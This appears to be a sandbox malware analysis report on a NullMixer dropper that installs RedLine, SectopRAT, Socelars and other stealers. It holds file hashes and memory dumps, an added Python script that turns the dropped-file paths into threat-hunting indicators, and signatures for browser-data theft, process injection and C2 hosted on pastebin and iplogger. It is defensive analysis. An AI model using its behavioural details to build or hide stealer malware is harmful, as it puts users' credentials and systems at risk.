memory/3640-170-0x00000000068D0000-0x000000000691C000-memory.dmp
memory/3720-175-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-2DB0E.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
memory/2024-171-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/3640-165-0x0000000006850000-0x000000000686E000-memory.dmp
memory/2892-145-0x0000000004CE0000-0x0000000004D56000-memory.dmp
memory/4680-144-0x0000000000550000-0x00000000005BA000-memory.dmp
memory/2892-143-0x00000000005D0000-0x0000000000640000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe
| MD5 | d75800977e3ec3199509eb2e0a6a28f5 |
| SHA1 | 3edc49c3a466f3bbc977c42406fbd5c90d49e462 |
| SHA256 | 90fc68c39590b8d6e7783e52e1660ff9ec68daee37940bf49399d95e6ad1fe7b |
| SHA512 | 5804a076e306d336f2897be6bb06e7cd80465977a8915ada3e9117128931611a13548b96086625cfc1e7477f067e68208bfceb5a5f38ce7e78716e20e81d4749 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rxk4n4ro.b4j.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu120bfbc2443b3b5d.exe
| MD5 | bdbbf4f034c9f43e4ab00002eb78b990 |
| SHA1 | 99c655c40434d634691ea1d189b5883f34890179 |
| SHA256 | 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae |
| SHA512 | dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec |
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu124078ed79bdbd5.exe
| MD5 | 962b4643e91a2bf03ceeabcdc3d32fff |
| SHA1 | 994eac3e4f3da82f19c3373fdc9b0d6697a4375d |
| SHA256 | d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b |
| SHA512 | ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd |
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12912263469836d.exe
| MD5 | a620135b51dda235d8cf29a7a0f24ef4 |
| SHA1 | 58eba3666c536215e3fc3660629dc63a999fe9e3 |
| SHA256 | 056091d19c1724c295197ccf6967d5b0cd98e87fa43dbbfd53de049526588b8d |
| SHA512 | fc6eac7f772dc14e96e421a16ab48092032baef5bd734e3ba58923a3b124ddcd7d39c5f3c0fd7056f4ef03b4f087244fce3e63788d3ddbfd7f166b2348fff0aa |
memory/3640-108-0x0000000006160000-0x00000000061C6000-memory.dmp
memory/3640-104-0x00000000060C0000-0x00000000060E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu122f7469b214cb59.exe
| MD5 | cd8b326d99a29d3c3586be7e51a33de9 |
| SHA1 | 5a50f0e17a398c6dc7c9c995826e7fe417762d07 |
| SHA256 | 0cd5a6958f291db7c078d25106a3265cce9aa53291c327ae1852a00b0d315049 |
| SHA512 | f5b75115291cf4fa15cb0a7a13a994bc18bd0195a2c088907fda270d6006f5e3bdf23aa482f0605cac381ceb15faab920daa0a143b5d448988b5055873d73c24 |
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12ca1c119bc29.exe
| MD5 | 929f431a5093b6ba736d6d17216f237a |
| SHA1 | 19cd747e4aa9f185eca3656a4d3ef7d28a9a279f |
| SHA256 | 5650aab287506d1139b3a5511f012cc4fa2b152f49cb17fe653ddbc821fee8bc |
| SHA512 | 9c0ffde8b9cfe579584e03d21c11a6d60d03a18da75315c40a4370d05cefa9e728c84a0668b8d03e7fe7afb0020adcb84803f63b508a72df868605d89fc7e4e8 |
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12b275ee70c7e913.exe
| MD5 | 9074b165bc9d453e37516a2558af6c9b |
| SHA1 | 11db0a256a502aa87d5491438775922a34fb9aa8 |
| SHA256 | 3ffdaa1515622897c84111ab4180de09aadd03674935555270a2789625f7e513 |
| SHA512 | ee0b950587c5a16a3c255f4c6b333e65cc2ada8429efc27e02165f4b3402fbd257a67f5adb8a3ffc1c4a4c95ecf2582da5ffbcb64322107e0e664ac7c388b62b |
memory/1480-106-0x0000000000760000-0x000000000077C000-memory.dmp
memory/1656-194-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/1656-193-0x0000000064940000-0x0000000064959000-memory.dmp
memory/1656-192-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/1656-191-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1656-189-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/1656-185-0x0000000000400000-0x000000000051C000-memory.dmp
memory/3640-199-0x000000006F1A0000-0x000000006F1EC000-memory.dmp
memory/3640-198-0x00000000077B0000-0x00000000077E2000-memory.dmp
memory/3640-209-0x0000000007790000-0x00000000077AE000-memory.dmp
memory/3640-210-0x0000000007800000-0x00000000078A3000-memory.dmp
memory/4736-215-0x0000000000400000-0x000000000041E000-memory.dmp
memory/4736-217-0x00000000051F0000-0x0000000005808000-memory.dmp
memory/4736-218-0x0000000004C80000-0x0000000004C92000-memory.dmp
memory/4736-221-0x0000000004E20000-0x0000000004E5C000-memory.dmp
memory/4736-219-0x0000000004EF0000-0x0000000004FFA000-memory.dmp
memory/3640-223-0x00000000081B0000-0x000000000882A000-memory.dmp
memory/3652-227-0x0000000000400000-0x000000000041E000-memory.dmp
memory/3640-226-0x0000000007B70000-0x0000000007B8A000-memory.dmp
memory/4884-229-0x000000006F1A0000-0x000000006F1EC000-memory.dmp
memory/3640-241-0x0000000007BF0000-0x0000000007BFA000-memory.dmp
memory/3640-244-0x0000000007DE0000-0x0000000007E76000-memory.dmp
memory/3640-246-0x0000000007D70000-0x0000000007D81000-memory.dmp
memory/4884-248-0x00000000072A0000-0x00000000072AE000-memory.dmp
memory/4884-249-0x00000000072B0000-0x00000000072C4000-memory.dmp
memory/2276-247-0x0000000000400000-0x0000000002F01000-memory.dmp
memory/3640-250-0x0000000007EA0000-0x0000000007EBA000-memory.dmp
memory/4884-251-0x0000000007390000-0x0000000007398000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1492553629fbbdcdbbec2f6d97052164 |
| SHA1 | f4ac24b073c82b8f748c4400df6b564536db57b1 |
| SHA256 | efdbba9fd00590bd807dc28c466a0870ad16d86cfd0a778ab15335b378f39a4d |
| SHA512 | d1ebd8196a27e1340b69d20068e372297555a94c12916f13c5eda86ef758136cdccc5521bf20bfa3af61fc457b293f450e1b8cf248b48a5c633dfaff28d38153 |
C:\Users\Admin\AppData\Local\Temp\XGud2je.9Ck
| MD5 | 4c8e336e944e027040c10a8735cd24f9 |
| SHA1 | d30e6ae06be8430c4e1a214d8bb0139e307faae5 |
| SHA256 | 220aac9ab0536f37faaf97c10494397045ae154daa6b2e3e33055704fbb855c2 |
| SHA512 | da3c801714d956bbc3fe985999ed093acee2b7ced14b13cc161fa339ba6f3c7002aff8fbccd5e596b7d90b7293918040a38e5bf19173995c367751fda94c5193 |
C:\Users\Admin\AppData\Local\Temp\1FRnX.N
| MD5 | ac6ad5d9b99757c3a878f2d275ace198 |
| SHA1 | 439baa1b33514fb81632aaf44d16a9378c5664fc |
| SHA256 | 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d |
| SHA512 | bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b |
C:\Users\Admin\AppData\Local\Temp\Dema.eP
| MD5 | 692db0108f3840d6536e482ab44a8ddd |
| SHA1 | 18062c95b2d2c7864973d6c40f76e3b6a448c58e |
| SHA256 | 0f6161b3927445039e7297404b841a7ea6968d88ce80d618307ea744d1b7af11 |
| SHA512 | 48bf5c14de18f77e731b86c919089429a9ace6f9edf93e6bcb73ca614edcf10a387b7737b85d3730036e35db09ff68c02e6c538228cb3ae48bf20e879ea0509e |
C:\Users\Admin\AppData\Local\Temp\6Q6HY.Re
| MD5 | 05e4ce7aaf4c9c2a0bb4399b9d01208d |
| SHA1 | 1f2a1a8356e2d909943bbcae8efbe032854fa831 |
| SHA256 | 374202f3e07fab4202655ea39339f88829a4702cb8f92ab6a2705a6e3aae0d36 |
| SHA512 | 9a8e0806c99cbbef62ac294fc8d9aa5dc1d0060f57ff075650dd58a375b7f309377c52c1154be1f394694fde994615b68b882f4be9b18abf8f34cef1096d3543 |
C:\Users\Admin\AppData\Local\Temp\y~A7gjIO.E
| MD5 | 4db3690c9cf2525f1919181be7200189 |
| SHA1 | 29889e5a2e8e1030c1c8517b24c44c3b555a296f |
| SHA256 | 721160b9f762c517522c56326e9040fa1457703a9aead210a4b2905a5122957c |
| SHA512 | aafda968325d1501066979771fb137cc354120de81d0aa9ccbc407ced9aceba1f3fd984f4857aa00424156bd6afd054515cc8f856e2750aaee7be5d242b90d51 |
C:\Users\Admin\AppData\Local\Temp\ISA502G.S7
| MD5 | 5d2571a51baa9b38d7180dbde1ebde3a |
| SHA1 | 4752e60d9ce426a82160a4da90c12a0a60487e75 |
| SHA256 | 9d5629b87d747c1791fe07e8efc410f5e8b0626033be586d83f549db50d527be |
| SHA512 | b59c4d7e6bc54be57934c659b37084f52cadc861746eccdd86ed6e0a0e862005dbf3716d171db773e77df99d015dfaf80b4273f8798c9e224376d1c44a2e8e50 |
memory/4360-273-0x0000000002610000-0x00000000027A5000-memory.dmp
memory/4004-276-0x0000000000400000-0x0000000000422000-memory.dmp
memory/4360-286-0x0000000002BA0000-0x0000000002C45000-memory.dmp
memory/4360-290-0x0000000002C60000-0x0000000002CF2000-memory.dmp
memory/4360-287-0x0000000002C60000-0x0000000002CF2000-memory.dmp
memory/1628-295-0x0000000000400000-0x0000000002F21000-memory.dmp
memory/1492-299-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2128-307-0x0000000000400000-0x00000000004BD000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
memory/4360-313-0x0000000002610000-0x00000000027A5000-memory.dmp
memory/1628-314-0x0000000000400000-0x0000000002F21000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 76e3611edf4b31f9abcaeee6ba1a1d40 |
| SHA1 | a05b11a3b9a538b7d37969b570938039a3473eeb |
| SHA256 | 14a6f5b0923c7ea00435c32b401ec28dd96e04ff6f9f54dad2c701f82aac8c40 |
| SHA512 | dd856a4d5611918da3d68643fa29b2c02c35f7786f0f9da186f25fd03114512cf8b2dc2a3e5acbeb36b0f4dd0c8c2104a7d11ac5808d675211ea93803f2efd31 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | aa35e3b5f4527d618ff3c46679f55868 |
| SHA1 | 08ae42bf575c4f54ef073517224824b79fea50b8 |
| SHA256 | b714395304e2b34a4bc666b4120a4d4bcd02088b3bb487509627c12f3721a7d3 |
| SHA512 | 0094ba16db774fca48e4672b51d335aaade005a4ffcf627106c5681007bbec19333754842d02752ad99a701d4560093a94ccd0026360fb7d719f9666a769d247 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 84a1207237dcabc32e72ad576a198e97 |
| SHA1 | c31c974a53f3fe0cfe6c72991b8e4ea858b4acc1 |
| SHA256 | 8a2d1c5004fd1c81e4301d2f2e08ba6434b36acfd5bcaee6b2e9815bd66aa06a |
| SHA512 | 6289a326719877145cd0a03bfcebac7101c8c03a01fac6a9f7da7789ba7d9ee87676b512e5c5ec5adedd2c328dfd1a36d9eb782bd68fa7a279e554381848216a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | c9541419438e206cac3a9f4d89b9e6d3 |
| SHA1 | 488af15898460b6778362946ddbb64a749b368e3 |
| SHA256 | ce27eb6ea20dc9539af717717d5babc41491242eea7e0d2804e086face386455 |
| SHA512 | db3df05a82874f1ff4c93f3687be1b3c425da69580944b456ecad6f52d623e9dfa1888ab5785f1c95ec1497c521443820aa1a07ea9d93551944778152053f473 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
| MD5 | ce95a660d17796b64dc224f7161df909 |
| SHA1 | aa58a02dc5772002e9703824485f07d97e4eaf79 |
| SHA256 | 8eb6a1fccc70ad03dc331cc95a316aad04737c80ef738f61706d86ffc33d77d6 |
| SHA512 | a4ab00c577217ff4f10b541a9af733f984a433c067bcb2b82cd313ec0770c09a4a62022bc77f2d68b7ef375ef33417091dd9d95dfef2706443479671156f1217 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 5ae616abd0ae0bd1c0e6ad51a4cfc425 |
| SHA1 | 9d170c23b14641980aa9cbae52a509191d48ea76 |
| SHA256 | 6bf2c74bebe3c8a20b9e8d8e2d6b474b52fe1139213a56cccc1f4188022d1706 |
| SHA512 | 5ceeac530985a46e16a75188f7fc6da42ccedb379e4b6876527959f744a9438a3b03d0085c610ac3b651fd45dc2771638840f8f62e0d7864ea2e94babe4cabf2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | d846968848f13cfcb79a9fd0671c8286 |
| SHA1 | 2e21dbc0436fecbcb6f2a4e5a7b7f942398e987a |
| SHA256 | cb4a2fb0ef24dcfde2ef9fbfe97e8102b1429b0534855910439d8460dfebdb43 |
| SHA512 | ac68e02a8bbf1fc60eb8ca8c43797425ee66e4a65921e5d3ffd631505892d0e446b5386e54899ffd107524a614ec8948e56be7e6cf44d2a292646f519068c8aa |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | f4f1d0a119b47dd0bc36490abb284178 |
| SHA1 | ba6717f6eaccdf70b41ea8751077f103da515c1d |
| SHA256 | b16ff6569369cbf777c789b1b98c1151a7cc062bdfaf55a5856dbead16ba9188 |
| SHA512 | d3ce93bc6b6bc804d74414e951c6139b968fd23e25505432f564446e1ee652272ace150e1e540ace377418c4b488792d7e6d05a4c9a9908772ae659433014b8f |
memory/4360-407-0x0000000002C60000-0x0000000002CF2000-memory.dmp
memory/4360-408-0x0000000002D00000-0x0000000003B18000-memory.dmp
memory/4360-409-0x0000000003B20000-0x0000000003BAB000-memory.dmp
memory/4360-410-0x0000000003BC0000-0x0000000003C47000-memory.dmp
memory/4360-413-0x0000000003BC0000-0x0000000003C47000-memory.dmp
memory/4360-414-0x00000000002A0000-0x00000000002A1000-memory.dmp
memory/4360-415-0x00000000002B0000-0x00000000002B4000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | d37ad49deab276c2897954fad0370cd8 |
| SHA1 | a09994f93020061b7017cd174a001359ae89b664 |
| SHA256 | c1866e38f077a37fbf00c04aa1c476cdc4c132389d4a34c0b9be59cf66a92313 |
| SHA512 | 0d4dc8410870ab1c44baf6ac518d0c5618d6f567ecefc38ed4b0b907a5ea365d96642dad8a0db934ba2093d4dad3eaeefe4392f49a70229192938631a3b00f8d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 563f4a8c0163a3a4403f13e58b40b468 |
| SHA1 | 84ee1ee27d2d0bd5734cc8837814bd3856b6b648 |
| SHA256 | 0c67b82c4815d1765c3060bc2794ce69fbf8905006cb5859da759a724160f3af |
| SHA512 | deb63061243a066a02c94aa6fc24b53fbff33868a498d70070b82340e27aa77a22e0faae68cab9c63420e6d3a1f01a3a0312a604e6d64cbf3942564df70b20f8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 3831bf7ac62bc1e3b653f8f8ca5d1e4e |
| SHA1 | e3ca71f4560b8fb7d8c1b291eb3982365c4321b1 |
| SHA256 | 134450ab6468a0e4bf0584d7cf843ee9fbc53863f5778ba5f4aff81e029d3ba6 |
| SHA512 | 687727de76d0218c93d8304387de28c486613d882bc7d41a97b802690e257f8fc293523b1ac457631e136acd7754d3364405816acd3a56d48973b97d798021af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 72720449b4d999a1f47220fe8ac28129 |
| SHA1 | 83b1a464102474c779575b7c84d315a6d40bc911 |
| SHA256 | 9b929637db1cec44e4848c7e606026ef89f811288108003914dfafea1d2f0a9c |
| SHA512 | 070e4894ef2c065d2508e995ff85ccf15005aa5a698ceda8ab5a69b028471f8ebb33184ee878066e1552f45777ed490c644abc1aa8eb72b0a19797b8f7790341 |
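Two things about the Files list above matter when turning it into indicators. First, the `7zS0B6F78A7` directory is the 7-Zip SFX extraction folder and the `is-NLVLE.tmp` style directories are Inno Setup's; both names are random per run (the behavioral3 detonation below uses `7zS058E7057`), so hunting on the full path misses the next execution and the stable indicators are the file names and hashes. Second, the repeated Chrome `Preferences` and `Local State` entries with different hashes are browser state rewritten while Chrome ran, not dropped payloads. The script below is an added example, not the sandbox vendor's code: it parses entries in the report's layout, replaces the random directories with placeholders, and separates dropped payloads from rewritten profile files. The entries are taken from the list above; the placeholder names and the payload-extension rule are assumptions of this script.

```python
"""Normalise the report's dropped-file list into path-independent IOCs.

Added example, not the sandbox vendor's code. The entries below are taken
from the report; the placeholder names (<7zSFX>, <INNO>, %LOCALAPPDATA%) and
the rule for what counts as a dropped payload are assumptions of this script.
"""
import re
from collections import defaultdict

# Constructed sample: a subset of the report's Files section in its own layout.
SAMPLE_FILES = r"""
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe
| MD5 | 9b2134ee1ae45204587c324a88830c08 |
| SHA1 | 4829c7a3ce45a7021d57c2da712949d7ea0f2bc6 |
| SHA256 | 3e0591618a8247d00aab0e95297f4250d140a312c52951d4163f5bc34d73af37 |
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu125e541847539.exe
| MD5 | 7c20266d1026a771cc3748fe31262057 |
| SHA256 | 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46 |
memory/3640-100-0x00000000052B0000-0x00000000052E6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-NLVLE.tmp\Thu125e541847539.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 84a1207237dcabc32e72ad576a198e97 |
| SHA256 | 8a2d1c5004fd1c81e4301d2f2e08ba6434b36acfd5bcaee6b2e9815bd66aa06a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 5ae616abd0ae0bd1c0e6ad51a4cfc425 |
| SHA256 | 6bf2c74bebe3c8a20b9e8d8e2d6b474b52fe1139213a56cccc1f4188022d1706 |
"""

HASH_ROW = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-f]+)\s*\|$")

# Per-run random directories: 7-Zip SFX stub (7zS + 8 hex), Inno Setup (is-XXXXX.tmp),
# and the sandbox user's profile. Replacements are literal strings (assumed placeholders).
RANDOM_DIRS = [
    (re.compile(r"\\7zS[0-9A-Fa-f]{8}\\"), "\\<7zSFX>\\"),
    (re.compile(r"\\is-[0-9A-Za-z]{5}\.tmp\\"), "\\<INNO>\\"),
    (re.compile(r"^C:\\Users\\[^\\]+\\AppData\\Local\\", re.I), "%LOCALAPPDATA%\\"),
]

PAYLOAD_EXT = (".exe", ".dll", ".tmp", ".ps1")


def normalise(path):
    """Strip the per-run random components so the same drop matches across detonations."""
    for pattern, placeholder in RANDOM_DIRS:
        path = pattern.sub(lambda _m, p=placeholder: p, path)
    return path


def parse_files(text):
    """Return (entries, memory_regions); each entry is (normalised_path, {algo: hex})."""
    entries, memory = [], []
    current = None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = HASH_ROW.match(line)
        if m and current is not None:
            current[1][m.group(1)] = m.group(2)
        elif line.startswith("memory/"):
            memory.append(line)      # memory dumps carry no hash rows in the report
            current = None
        elif not line.startswith("|"):
            current = (normalise(line), {})
            entries.append(current)
    return entries, memory


def summarise(entries):
    """Split entries into dropped payloads (path -> SHA256s) and rewritten browser state."""
    dropped = defaultdict(list)
    profile = defaultdict(int)
    for path, hashes in entries:
        sha = hashes.get("SHA256")
        if "\\Google\\Chrome\\" in path:
            profile[path] += 1       # same file, different hash: rewritten, not dropped
        elif path.lower().endswith(PAYLOAD_EXT) and sha and sha not in dropped[path]:
            dropped[path].append(sha)
    return dict(dropped), dict(profile)


if __name__ == "__main__":
    entries, memory = parse_files(SAMPLE_FILES)
    dropped, profile = summarise(entries)
    for path, shas in dropped.items():
        print(path, shas)
    print("rewritten profile files:", profile, "memory regions:", len(memory))
```

The normalised paths (for example `%LOCALAPPDATA%\Temp\<7zSFX>\setup_install.exe`) are what to carry into a hunt query, paired with the SHA256 values; the raw `7zS...` and `is-...tmp` names are only useful for correlating within this one detonation.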
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-22 07:31
Reported
2024-11-22 07:33
Platform
win7-20241010-en
Max time kernel
119s
Max time network
124s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 988 set thread context of 1288 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu126011caea28.exe | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu126011caea28.exe |
| PID 2988 set thread context of 2980 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu128b511c77e8c.exe | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu128b511c77e8c.exe |
| PID 3060 set thread context of 2920 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12912263469836d.exe | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12912263469836d.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu122f7469b214cb59.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-8FFJH.tmp\Thu125e541847539.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12465fe68f85b6156.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu123e05ebe43921.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12912263469836d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12493eba7a.exe | N/A |
